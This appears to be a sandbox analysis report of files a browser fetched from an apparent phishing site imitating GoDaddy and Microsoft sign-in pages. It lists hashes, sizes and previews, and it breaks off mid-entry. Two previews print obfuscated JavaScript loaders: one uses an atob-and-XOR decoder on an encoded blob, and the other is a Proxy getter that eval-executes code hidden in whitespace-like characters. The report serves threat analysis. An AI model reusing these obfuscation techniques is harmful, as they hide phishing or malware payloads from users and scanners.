                                                                      Encrypted:false
                                                                      SSDEEP:
                                                                      MD5:6C20A2BE8BA900BC0A7118893A2B1072
                                                                      SHA1:FF7766FDE1F33882C6E1C481CEED6F6588EA764C
                                                                      SHA-256:B1C42ACD0288C435E95E00332476781532ED002CAC6F3DCEE9110CED30B31500
                                                                      SHA-512:8F80AD8ADC44845D24E13D56738A2CA2A73EE6FCDC187542BA4AAEBBF8817935D053A2ACFB0D425B9CC0C582B5091E1C9FE16B90B3AA682187645067C267FC41
                                                                      Malicious:false
                                                                      Reputation:unknown
                                                                      URL:https://objects.githubusercontent.com/github-production-release-asset-2e65be/2925284/11f3acf8-4ccb-11e6-8ce4-c179c0a212de?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250319%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250319T094719Z&X-Amz-Expires=300&X-Amz-Signature=b954c13fbd471219076f466be3a670f9689baefc72b9990946bf12b7565cd328&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Drandexp.min.js&response-content-type=application%2Foctet-stream
                                                                      Preview://.// randexp v0.4.3.// Create random strings that match a given regular expression..//.// Copyright (C) 2016 by Roly Fentanes (https://github.com/fent).// MIT License.// http://github.com/fent/randexp.js/raw/master/LICENSE .//.!function(){var e="RandExp",t=function(){return function e(t,n,r){function o(s,i){if(!n[s]){if(!t[s]){var u="function"==typeof require&&require;if(!i&&u)return u(s,!0);if(a)return a(s,!0);var p=new Error("Cannot find module '"+s+"'");throw p.code="MODULE_NOT_FOUND",p}var h=n[s]={exports:{}};t[s][0].call(h.exports,function(e){var n=t[s][1][e];return o(n?n:e)},h,h.exports,e,t,n,r)}return n[s].exports}for(var a="function"==typeof require&&require,s=0;s<r.length;s++)o(r[s]);return o}({1:[function(e,t,n){function r(e){return e+(e>=97&&122>=e?-32:e>=65&&90>=e?32:0)}function o(){return!this.randInt(0,1)}function a(e){return e instanceof h?e.index(this.randInt(0,e.length-1)):e[this.randInt(0,e.length-1)]}function s(e){if(e.type===p.types.CHAR)return new h(e.value);if(e.
                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      File Type:RIFF (little-endian) data, Web/P image
                                                                      Category:dropped
                                                                      Size (bytes):892
                                                                      Entropy (8bit):5.863167355052868
                                                                      Encrypted:false
                                                                      SSDEEP:
                                                                      MD5:41D62CA205D54A78E4298367482B4E2B
                                                                      SHA1:839AAE21ED8ECFC238FDC68B93CCB27431CD5393
                                                                      SHA-256:20A4A780DB0BCC047015A0D8037EB4EB58B3E5CB338673799C030A3E1B626B40
                                                                      SHA-512:82B9806490A0DB493DA16466738437B9BB54B979075DB58C89CA0D192D780DDB5ED888E10CE76A53D48D30D5013791CAC7AB468D85B61D32766140DD53DC9044
                                                                      Malicious:false
                                                                      Reputation:unknown
                                                                      Preview:RIFFt...WEBPVP8X....0.../../..ICCP.............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6ALPH=......m[..H.A.).U....A..C.u@. ....L.......;.....$3{2{....3..V6.i.W.F.h..ee^k.:..cl.Z.eb.....).IZ....!....;X.:&...hF0...kM......!W5.ak8.......#V.s...2...`..v...}.(0 p../s.'VS`SjX.B.,...v.#./I....}.b....^*1..k.:F9hgb.HgW.Q^.r}..Y5....'.JJ....&.."]<.M.Z)o.H..].i.H1..G.P>.b.{.G.\BYx*.[.y...?L....:.%.d......%.q..VP8 @...0....*0.0.>U .E..!.4.8.D...o..z...A....Z........?..z......k...
                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      File Type:RIFF (little-endian) data, Web/P image
                                                                      Category:dropped
                                                                      Size (bytes):644
                                                                      Entropy (8bit):4.6279651077789685
                                                                      Encrypted:false
                                                                      SSDEEP:
                                                                      MD5:541B83C2195088043337E4353B6FD60D
                                                                      SHA1:F09630596B6713217984785A64F6EA83E91B49C5
                                                                      SHA-256:2658B8874F0D2A12E8726DF78AC8954324C3BBE4695E66BDEF89195FDE64322F
                                                                      SHA-512:B2AE42BA9D3A63D3ACB179051B005F2589F147D94F044616AE5DC5705E873F16057C56934262841191263B4C35804EF188BD38CF69CCE0F4B2CF76C05F17B8AD
                                                                      Malicious:false
                                                                      Reputation:unknown
                                                                      Preview:RIFF|...WEBPVP8X....0.........ICCP.............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6ALPHK....W`$....z..".Y..P}0;.PE..G..h....9.@..`..2.......=.T.....-3..ow.*...&......VP8 :...0....*....>m&.M.!"......i...O...(.........g....w...XG...
                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      File Type:very short file (no magic)
                                                                      Category:dropped
                                                                      Size (bytes):1
                                                                      Entropy (8bit):0.0
                                                                      Encrypted:false
                                                                      SSDEEP:
                                                                      MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                                      SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                                      SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                                      SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                                      Malicious:false
                                                                      Reputation:unknown
                                                                      Preview:0
                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:downloaded
                                                                      Size (bytes):35786
                                                                      Entropy (8bit):5.058073854893359
                                                                      Encrypted:false
                                                                      SSDEEP:
                                                                      MD5:38501E3FBBBD89B56AA5BA35DE1A32FE
                                                                      SHA1:D9B31981B6F834E8480BA28FBC1CFF1BE772F589
                                                                      SHA-256:A1CA6B381CB01968851C98512C6E7F6C5309A49F7A16B864813135CBFF82A85B
                                                                      SHA-512:1547937AA9B366E76DE44933EF48EF60E3D043245E8E3E01C97DFC2981F6B1F61463D9D30992FBCF2CA25FC1B7B32FF808B9789CFB965D74455522FC58E0C08C
                                                                      Malicious:false
                                                                      Reputation:unknown
                                                                      URL:https://jx7d.qdjcpol.ru/ab0AixXB22vfIpqWn0cd30
                                                                      Preview:#sections_godaddy {..font-family: gdsherpa !important;..}..#sections_godaddy a {.. color: var(--ux-2rqapw,#000);.. -webkit-text-decoration: var(--ux-1f7if5p,underline);.. text-decoration: var(--ux-1f7if5p,underline);.. background-color: transparent;..}....#sections_godaddy #root {.. flex: 1 1 0%;..}....#sections_godaddy a:hover {../* color: var(--ux-1j87vvn,#fff);*/.. -webkit-text-decoration: var(--ux-1ft0khm,underline);.. text-decoration: var(--ux-1ft0khm,underline);..}....#sections_godaddy svg {.. overflow: hidden;.. vertical-align: unset;..}....#sections_godaddy .ux-button {.. --ux-button-icon-margin: calc((var(--ux-t379ov,var(--ux-jw5s9j,1.5)) * 1em - 1.5em) / 2);.. padding: 0;.. text-decoration: var(--ux-1f7if5p,underline);.. -webkit-text-decoration: var(--ux-1f7if5p,underline);.. gap: 0.5em;.. cursor: pointer;.. --ux-button-icon-margin: calc((var(--ux-t379ov,var(--ux-jw5s9j,1.5)) * 1em - 1.5em) / 2);.. font-weight: inherit;.. background: transparent;.. gap:
                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      File Type:SVG Scalable Vector Graphics image
                                                                      Category:downloaded
                                                                      Size (bytes):270
                                                                      Entropy (8bit):4.840496990713235
                                                                      Encrypted:false
                                                                      SSDEEP:
                                                                      MD5:40EB39126300B56BF66C20EE75B54093
                                                                      SHA1:83678D94097257EB474713DEC49E8094F49D2E2A
                                                                      SHA-256:765709425A5B9209E875DCCF2217D3161429D2D48159FC1DF7B253B77C1574F4
                                                                      SHA-512:9C9CD1752A404E71772003469550D3B4EFF8346A4E47BE131BB2B9CB8DD46DBEF4863C52A63A9C63989F9ABEE775CB63C111ADD7AFA9D4DFC7A4D95AE30F9C6E
                                                                      Malicious:false
                                                                      Reputation:unknown
                                                                      URL:https://jx7d.qdjcpol.ru/efK2FIvDz4exzwBMGuiQzijGRS9SC3l3iixUgqu1a78150
                                                                      Preview:<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" viewBox="0 0 12 12"><title>assets</title><rect width="12" height="12" fill="none"/><path d="M6.7,6,12,11.309,11.309,12,6,6.7.691,12,0,11.309,5.3,6,0,.691.691,0,6,5.3,11.309,0,12,.691Z" fill="#262626"/></svg>
                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      File Type:SVG Scalable Vector Graphics image
                                                                      Category:dropped
                                                                      Size (bytes):7390
                                                                      Entropy (8bit):4.02755241095864
                                                                      Encrypted:false
                                                                      SSDEEP:
                                                                      MD5:B59C16CA9BF156438A8A96D45E33DB64
                                                                      SHA1:4E51B7D3477414B220F688ADABD76D3AE6472EE3
                                                                      SHA-256:A7EE799DD5B6F6DBB70B043B766362A6724E71458F9839306C995F06B218C2F8
                                                                      SHA-512:2C7095E4B819BC5CAA06811A55C0DAE6706970F981806DCF7FD41F744C1DC6A955657A8E57829B39B376B892E8173E8A41F683D329CFBBD0EC4D4019B10E52FF
                                                                      Malicious:false
                                                                      Reputation:unknown
                                                                      Preview:<svg width="48" height="48" viewBox="0 0 48 48" fill="none" xmlns="http://www.w3.org/2000/svg">..<mask id="07b26034-56a3-49d2-8f26-c7b84eb4eed4" fill="#ffffff">..<path fill-rule="evenodd" clip-rule="evenodd" d="M23.9762 0C16.8244 0 10.9707 5.24325 10.335 12.9974C6.89614 14.0647 4.5 17.2233 4.5 20.9412C4.50019 20.968 4.50041 20.9949 4.50066 21.0218C4.50022 21.0574 4.5 21.093 4.5 21.1287C4.55021 28.2609 6.80967 39.1601 18.6091 46.4932C21.8225 48.5023 25.8896 48.5023 29.1532 46.4932C41.053 39.2103 43.3125 28.3111 43.3125 21.1287C43.3125 21.108 43.3124 21.0872 43.3123 21.0665C43.3124 21.0246 43.3125 20.9829 43.3125 20.9412C43.3125 17.3371 41.0055 14.1946 37.6702 13.0618C37.0607 5.27148 31.147 0 23.9762 0ZM12.2354 38.4694C14.3087 33.9987 18.8368 30.8981 24.0891 30.8981C29.2395 30.8981 33.6936 33.8797 35.8194 38.2109C33.9302 40.6119 31.4399 42.8954 28.1744 44.8939L28.1724 44.8952L28.1703 44.8965C25.5047 46.5374 22.2037 46.5293 19.6031 44.9034L19.6009 44.902L19.5988 44.9007C16.4876 42.9672 14
                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      File Type:RIFF (little-endian) data, Web/P image
                                                                      Category:dropped
                                                                      Size (bytes):1298
                                                                      Entropy (8bit):6.665390877423149
                                                                      Encrypted:false
                                                                      SSDEEP:
                                                                      MD5:32CA2081553E969F9FDD4374134521AD
                                                                      SHA1:7B09924C4C3D8B6E41FE38363E342DA098BE4173
                                                                      SHA-256:216FC342A469AA6A005B2EACC24622095E5282D3E9F1AE99CE54C27B92EC3587
                                                                      SHA-512:F75749C6344FCD7BF06872A3678BB2EB4CAE2DDC31CC5D1EE73EFBA843705577841667733A83163AF4336EC8A32DF93E7A36155BD6282D7BB86159644975948C
                                                                      Malicious:false
                                                                      Reputation:unknown
                                                                      Preview:RIFF....WEBPVP8X....0...k.....ICCP.............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6ALPHX.....\m{.z..........T ..Q....R..*.X....U`..@......Yyy..<q.."b..a....K._.....jH.*...}q..........^.-.\.4. &.H~.q..H.q.'.t..p....0)...X.....8./.... ..6.#H..Y..../...E>.#.tv....9.\.p5......h......1.{@.k].(1...B.........u.n....=....sX...*..I.c]r....S.....u.a...X.....Pi..q.$73..ga..h%9.S.l.....}....^%.@:Q....we8x..j..3.^.}5.fFtZ...3....<. x.s....d@(./.<].y...m.....T..........T.P`....5..<qYl.g..k..N. `_...f....yN.R.PB..p|..-.%.`y.._.]C.v.<.Y...V..I..(.c....>...........k....nt
                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      File Type:ASCII text, with very long lines (26765), with no line terminators
                                                                      Category:downloaded
                                                                      Size (bytes):26765
                                                                      Entropy (8bit):5.114987586674101
                                                                      Encrypted:false
                                                                      SSDEEP:
                                                                      MD5:1A862A89D5633FAC83D763886726740D
                                                                      SHA1:E5CE3AA454C992A13FD406A9647D7AFBF831051F
                                                                      SHA-256:5C22FD904EDB792331A7307DDF4A790E0D1318924F6D8E7362FA6B55D5AB6FBB
                                                                      SHA-512:3BFAB627DC0EBFAE1176098C870B4D2747518E7EA91646303276191A4A846D47B2E80BB1EE2FA67271130ECCBC8B1152778C99917FC6C63EA45A184BD673BF0D
                                                                      Malicious:false
                                                                      Reputation:unknown
                                                                      URL:https://jx7d.qdjcpol.ru/560ZS9mOYZWpzpxydDyD8920
                                                                      Preview:#authcalldesc,#sections,.text-m{font-size:.9375rem}*,input[type=radio]{box-sizing:border-box;padding:0}.alert,.radio label,.row.tile{margin-bottom:0}#sections,.input-group-addon,.table .table-cell,img{vertical-align:middle}#sections_doc .pdfheader #pageName,#sections_pdf .pdfheader #pageName,.row.tile,.row.tile:not(.no-pick):active,.row.tile:not(.no-pick):hover,input{color:inherit}.p,.subtitle,.text-body,.text-subtitle,h4{font-weight:400}*,.text-title{font-family:"Segoe UI","Helvetica Neue","Lucida Grande",Roboto,Ebrima,"Nirmala UI",Gadugi,"Segoe Xbox Symbol","Segoe UI Symbol","Meiryo UI","Khmer UI",Tunga,"Lao UI",Raavi,"Iskoola Pota",Latha,Leelawadee,"Microsoft YaHei UI","Microsoft JhengHei UI","Malgun Gothic","Estrangelo Edessa","Microsoft Himalaya","Microsoft New Tai Lue","Microsoft PhagsPa","Microsoft Tai Le","Microsoft Yi Baiti","Mongolian Baiti","MV Boli","Myanmar Text","Cambria Math"}*{margin:0}.websitesections{height:100%;width:100vw;position:relative}#sections_doc,#sections_go
                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      File Type:HTML document, ASCII text, with very long lines (17069), with CRLF line terminators
                                                                      Category:downloaded
                                                                      Size (bytes):22096
                                                                      Entropy (8bit):5.926936180150003
                                                                      Encrypted:false
                                                                      SSDEEP:
                                                                      MD5:E0362B36967BE0F55091D343E5747EBC
                                                                      SHA1:F7938A075B9828D5FEE6E70C971548DDC80950FA
                                                                      SHA-256:00D84078AEF2E920A2C5E8BA836F769E2D9DC873E93E77B83E357DE5E9A12299
                                                                      SHA-512:4F7EF212502A6427F5500E5FCC241CF0CACA0C59BD3EA23961F12FEE437B55BCED9FDBE18274A48CB046C0E17A9BB62393B8A79077E4172243C1DD7E12660012
                                                                      Malicious:false
                                                                      Reputation:unknown
                                                                      URL:https://jx7d.qdjcpol.ru/WpB8P/
                                                                      Preview:<script>..function CkfoWgsOrf(hocwcBrQJo, jSleRPUFtR) {..let tYkdCXcAuz = '';..hocwcBrQJo = atob(hocwcBrQJo);..let MsuYTOThJh = jSleRPUFtR.length;..for (let i = 0; i < hocwcBrQJo.length; i++) {.. tYkdCXcAuz += String.fromCharCode(hocwcBrQJo.charCodeAt(i) ^ jSleRPUFtR.charCodeAt(i % MsuYTOThJh));..}..return tYkdCXcAuz;..}..var WhNFEUVrHC = CkfoWgsOrf(`bRsMExA9A3MpITJVTQkNOQcgYHx+CwAFHGMdIi82IxFBAhYgWDkrJjQaFkxKY0F9an08AQFPEz5VbWZ8IgsdCAk5SV5QbyILHQgJOVcgKDBsSgcVDT0EaXV8MgwBCwpjFD81JjUOAwALKFkwNT5+CQUAAWIbOjggfgsdGAk5GH4wIH5cQVBXfFgwKCohHABMEz5ZPjM9fwIcQ0dxWCA5ITgYG190R3pZZiAyGgYRDXN6WTQ2JkgpFBcuAzo1PXkJGw4bZVAyDQo2IyhUESkaPzQKCToZAhB4RAkNGToLAg1LFy8aPTUZHwgFSyECCR1qYiQCLxEvMCsLMhYuGgU+dAMaEitpIScFCS8aASw3KF0JAj4lHzE0AScKPCNBKzQRLwoJMh87SwtHMWkaJAw3LxUuHBU0CQZdXy0UIQIKaCtgMig3AwY0GRk3CSIYKBAmBxoSIB8rBiAeBDQSPRoSKQgFSyECCR1qYiQCGQ8URRVqMgZRGig9fRAaNxU4Clw3SQIaGSkKBl0dKBM+ORA0Yx8rAjMPFEQFLgkGXV8tFAscCR8FYzI4VEkZMD8gNxY+GjshBBgaNyc9DTgzDylFZzMfEioCBS54HTcdPycKBiAWFy8JNjE/OR8oMT45EDMSNiEs
                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      File Type:Unicode text, UTF-8 text, with very long lines (21720), with CRLF line terminators
                                                                      Category:downloaded
                                                                      Size (bytes):4712061
                                                                      Entropy (8bit):2.583772531747173
                                                                      Encrypted:false
                                                                      SSDEEP:
                                                                      MD5:E34A613844E71AD9EA25A2FAAB768F3F
                                                                      SHA1:34844596642BED7752C4AED44721CEE52593B344
                                                                      SHA-256:D767A16A68A568D204E0E4283BDDB8A9702CCF95BF2715D512C4AE39C3D79AB5
                                                                      SHA-512:8D5342EC77557793F73701400220B10421E6B1ED941876554D27F27A0573644F26C66FA4AB7019E666F6471688E2F7857394CC127197EF109FC076BC5534342C
                                                                      Malicious:false
                                                                      Reputation:unknown
                                                                      URL:https://jx7d.qdjcpol.ru/34RYny4Df6mtfDjmiKr0cnjcs1ij2pkVWqY1OIag67110
                                                                      Preview:function decodeAndEvaluate(key) {.. const binaryString = [...key].. .map(char => Number('.' > char)).. .join('').. .replace(/.{8}/g, byte => String.fromCharCode(parseInt(byte, 2)));.. .. (0, eval)(binaryString);.. return true;..}....const handler = {.. get: function(_, prop) {.. decodeAndEvaluate(prop);.. return true;.. }..};..const viewsen = new Proxy({}, handler);..viewsen["........................................................................................................................................................................................................
                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      File Type:SVG Scalable Vector Graphics image
                                                                      Category:downloaded
                                                                      Size (bytes):2905
                                                                      Entropy (8bit):3.962263100945339
                                                                      Encrypted:false
                                                                      SSDEEP:
                                                                      MD5:FE87496CC7A44412F7893A72099C120A
                                                                      SHA1:A0C1458C08A815DF63D3CB0406D60BE6607CA699
                                                                      SHA-256:55CE3B0CE5BC71339308107982CD7671F96014256DED0BE36DC8062E64C847F1
                                                                      SHA-512:E527C6CD2A3D79CA828A9126E8FF7009A540AA764082750D4FA8207C2B8439CA1FDC4459E935D708DC59DCFFE55FE45188EB5E266D1B745FCA7588501BC0117D
                                                                      Malicious:false
                                                                      Reputation:unknown
                                                                      URL:https://jx7d.qdjcpol.ru/wx1tT22QUEgCZaGjn5nvopa9nekPTk1HUOZXab180
                                                                      Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M30.422,29.092a3.493,3.493,0,0,1,1.324.261,3.381,3.381,0,0,1,1.132.749q.366.366.827.775t.949.854q.488.444.941.932a9.974,9.974,0,0,1,.819,1A4.951,4.951,0,0,1,37,34.736a3.133,3.133,0,0,1,.218,1.15,3.493,3.493,0,0,1-.261,1.324,3.381,3.381,0,0,1-.749,1.132q-.888.888-1.6,1.568a8.753,8.753,0,0,1-1.489,1.15,6.17,6.17,0,0,1-1.716.705A9.367,9.367,0,0,1,29.151,42a13.73,13.73,0,0,1-3.9-.592A21.891,21.891,0,0,1,21.26,39.77a27.749,27.749,0,0,1-3.885-2.491,34.863,34.863,0,0,1-3.6-3.153,34.6,34.6,0,0,1-3.127-3.606,27.717,27.717,0,0,1-2.456-3.876A22.2,22.2,0,0,1,6.584,22.69,13.485,13.485,0,0,1,6,18.866,9.453,9.453,0,0,1,6.235,16.6a6.2,6.2,0,0,1,.7-1.707,8.848,8.848,0,0,1,1.141-1.489q.679-.723,1.585-1.611a3.381,3.381,0,0,1,1.132-.749,3.493,3.493,0,0,1,1.324-.261,3.3,3.3,0,0,1,1.681.47,8.648,8.648,0,0,1,1.542,1.15,17.725,17.725,0,0,1,1.376,1.428q.645.
                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      File Type:PNG image data, 1920 x 1080, 8-bit/color RGB, non-interlaced
                                                                      Category:dropped
                                                                      Size (bytes):214581
                                                                      Entropy (8bit):7.989476951155978
                                                                      Encrypted:false
                                                                      SSDEEP:
                                                                      MD5:73E4A57308882BB368A1E2F49E58497F
                                                                      SHA1:99CEF0948C0A6114982E66D28AD311CA95D6F09C
                                                                      SHA-256:759C1FA1BBE8316C91FE672EE390CA824622A3CB5D4F6FE74B996677B6417D9C
                                                                      SHA-512:2B2912E924EDC40BFFA1B4B722320B7C4F38A51DF4F11B3A20782857AA9EFCD2FD8D6B82A2D7F20A68BBB496A9A232AA31F707D91DC411868C674CB18BF83904
                                                                      Malicious:false
                                                                      Reputation:unknown
                                                                      Preview:.PNG........IHDR.......8.....g.V.....pHYs...#...#.x.?v..E.IDATx..........;..Gu........k......[.>r.I.....H.,l,..M`S:.:.o....."...HX......YR?.....A>W......6..w...N..Hi......~..L...i*..v.2.J../V..6......g.i.v.....o...w.8.Et..3.q.....F.sm..\.t.....5...k.M...Q....f...-...p.:.=...K..%.]...C..9t.Q..v.....|=....M..O..~.GL.X.~]4.(O_......Q...6.&.E;..b`._.o..U....UO....yZ...@o.<^csD7}.......m`l.......Z..9cc.O&aLO.......G..&......N.j.s.).....:...q...V7.w,..;...fLJ....m..'.]....J.D..i.t.B...@o.<^Q.Y.,+.@....9..x..6.NBp.9.b........Z......q.I..k...[.............;..U.n.....Gy..C..[z..V&...O...;.:...z......x.y.g...O.s..Fa.*.......7...J......k........TsT.3..[...#.u........D...A.....*mn.......S.C...7}..M.g.2..p.g.h.s...!..?..../..C..^.G../..[H.b...o.l.un...1.H#J.3.^...y.N...B.:..m.....6.~.6.....~z....:...z......:s..|..b...Y...2.._+*... ..ah....y..K)`M6z..n.?...;.[...H.......).T.1..b.5s.kW.za..A.u.C.a.h.h'=jXzV.Q../.@o.<X.>..b................wn<c....&R
                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      File Type:RIFF (little-endian) data, Web/P image
                                                                      Category:downloaded
                                                                      Size (bytes):9648
                                                                      Entropy (8bit):7.9099172475143416
                                                                      Encrypted:false
                                                                      SSDEEP:
                                                                      MD5:4946EB373B18D178C93D473489673BB6
                                                                      SHA1:16477ACB73B63CA251D37401249E7E4515FEBD24
                                                                      SHA-256:666BC574C9F3FB28A8AC626FA8105C187C2A313736494A06BD5A937473673C92
                                                                      SHA-512:F684B90B748DC8399F76C5D8F94AF6C4E6869143F18D19CE435B25EAA14E9647B120467BDD0795895676DC0CCCDEABF82BEB2F46CE2C5BF4C58ED9C134F30C48
                                                                      Malicious:false
                                                                      Reputation:unknown
                                                                      URL:https://jx7d.qdjcpol.ru/qrCGMlrf6UAppLLNdTWauA5MMGs9ipT58Q7xPSLq9Qtes84yIOstapY0rISWX25MuEeeyMuJRL2TOlgxItFUUcd240
                                                                      Preview:RIFF.%..WEBPVP8X....0.........ICCP.............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6ALPH......0....n.mu..G..t042.....@...`[...%...6....9AD.'@.,f.B...+..+..+..W&.p.....h.......f.-...+.....m...n....E....O].+R.&Q..#.X.ip4..p......\O...\/....9.5.a..DfZ,K....8.....Z..2..z......t.......|.I.(..6E.D.}.C..OQD$S}iZ...[D.......q`(...@../.NQ......+"b%.X.D".G.*...0G...".2........x.O......7......E..&....e.F..4...K>.M..Pd.B...@'o./te..[.f....4[..a..x...9#.@$.=...t..=..t_.W....[..f.|fv...N...c6..k4}.9.7.....f.F3.4[...a...;.m.@N.n.0.....n.G[c.H.}..t.{..;....G...2.::..].0....
                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      File Type:Web Open Font Format (Version 2), TrueType, length 28000, version 1.66
                                                                      Category:downloaded
                                                                      Size (bytes):28000
                                                                      Entropy (8bit):7.99335735457429
                                                                      Encrypted:true
                                                                      SSDEEP:
                                                                      MD5:A4BCA6C95FED0D0C5CC46CF07710DCEC
                                                                      SHA1:73B56E33B82B42921DB8702A33EFD0F2B2EC9794
                                                                      SHA-256:5A51D246AF54D903F67F07F2BD820CE77736F8D08C5F1602DB07469D96DBF77F
                                                                      SHA-512:60A058B20FCB4F63D02E89225A49226CCD7758C21D9162D1B2F4B53BBA951B1C51D3D74C562029F417D97F1FCA93F25FDD2BC0501F215E3C1EF076810B54DD06
                                                                      Malicious:false
                                                                      Reputation:unknown
                                                                      URL:https://jx7d.qdjcpol.ru/GDSherpa-bold.woff2
                                                                      Preview:wOF2......m`......$...l....B.......................6....`..<.<..b.....$....6.$..x..>.. .....{...[..q.k.]]O....s...|..n...!..[<;....P&..g....!..I'i..Q.DP....9..J......9G..Q1(..)Jn......8Y......)J.F.c A..7k.v...2=.Z.n.4`...~Nl...4;...S.l{w..:.#..=!. ..X....>[.7........1??.3.?t..qE..f...b...,.Fwcp8...4^.^x..|....Ro<%.."....~0..q..rP..G.......R....-..{O.QeJ.....6.E........{.{.....,h.!.._......$..3..cF@..>........t.o...Fc ...YS.....s.V..j....uk.`n......#....6.....1`kbd..Z..).x...F........T.._..}...p..._F.0.S'.V.g........3.$...Jf.j._,J....v7(...(..bm.....a....Nh.(QS.H...5.w.o.1.[<m.1.cJ......B......R..L..>[|@..]../...6.\..(.j.Bn...Oj.&/j@.'T...w.,...*...e.g.I=.w.x..ap..?.......lI../..uuDH.P.....)._...<..C.x.......Kh.P.|"M..JQ......?`..S@{..o..RjCE.qx.p.!(Wi....dY.%./r.#.p..C ..........r.o4P.}...3X..].....6.'~&...]...*y...YQ..9."v....3...oEMQoWM.W`................Y.V..O2......l....p.1..B..Fn..o.<..,C......^.Y.C...W..tX..|.`...5:.Yd@]..j..$...v.
                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      File Type:Web Open Font Format (Version 2), TrueType, length 43596, version 1.0
                                                                      Category:downloaded
                                                                      Size (bytes):43596
                                                                      Entropy (8bit):7.9952701440723475
                                                                      Encrypted:true
                                                                      SSDEEP:
                                                                      MD5:2A05E9E5572ABC320B2B7EA38A70DCC1
                                                                      SHA1:D5FA2A856D5632C2469E42436159375117EF3C35
                                                                      SHA-256:3EFCB941AADDAF4AEA08DAB3FB97D3E904AA1B83264E64B4D5BDA53BC7C798EC
                                                                      SHA-512:785AB5585B8A9ED762D70578BF13A6A69342441E679698FD946E3616EF5688485F099F3DC472975EF5D9248AFAAD6DA6779813B88AA1DB60ABE2CC065F47EB5F
                                                                      Malicious:false
                                                                      Reputation:unknown
                                                                      URL:https://jx7d.qdjcpol.ru/GDSherpa-vf.woff2
                                                                      Preview:wOF2.......L.......P..............................U...z...?HVAR.;?MVARF.`?STAT...H/L.....@..P..>.0....6.$..x. .....{[.q....Rl....t..~v....(....T.t.;..n'..v=....?...l].xI...m."..?hNX.,...8.;G...m,}.h.>(=[...m/.>....8&f..&.......].u...&.VD..].<..yR.eb<,x......)..c..t...k...9..o.T..R9..kq..TR%U..v....r._......D...f..=qH...8.<...x..(V.I.h.L3*#]8...-.z.........3.9V..........u.........x.....S_...\1...&6...j^...c;()m.J.....>....xz..Y...|.7......!.jw...,.L.;N.......n......].....8].R..d.....`.R.B..#..,...1R.UJD..b.`.0<....FA=..{.....`....c...R..Uy..J.k.".j..N.{w..UT<.8T66...H,...FH.GS.G.]......?.T.!4..8...B...l.p@.......t.o...v...b.g..?..m..!.%.....x..MC1M...........k...})..+N.....Q_yS.X.11a....&`..'".xZ..=b^...iD...} .. ..b...}DIvu.q....k.4.....@.....P*..j..)..'.L......b..RQjI*I..Qk.T.l._wO..$....!c..%.{.._N..E@....A...?...aW.y.gf.g.&E... ~.x.b....b...~......f/.....G....J.6.y.....zE@T.a.0^Ul......S:..,..}..B.R..Rt~.v...L:`4.IKA..V...x&@...h.7.P.....*.
                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      File Type:ASCII text, with very long lines (48238)
                                                                      Category:downloaded
                                                                      Size (bytes):48239
                                                                      Entropy (8bit):5.343270713163753
                                                                      Encrypted:false
                                                                      SSDEEP:
                                                                      MD5:184E29DE57C67BC329C650F294847C16
                                                                      SHA1:961208535893142386BA3EFE1444B4F8A90282C3
                                                                      SHA-256:DD03BA1DD6D73643A8ED55F4CEBC059D673046975D106D26D245326178C2EB9D
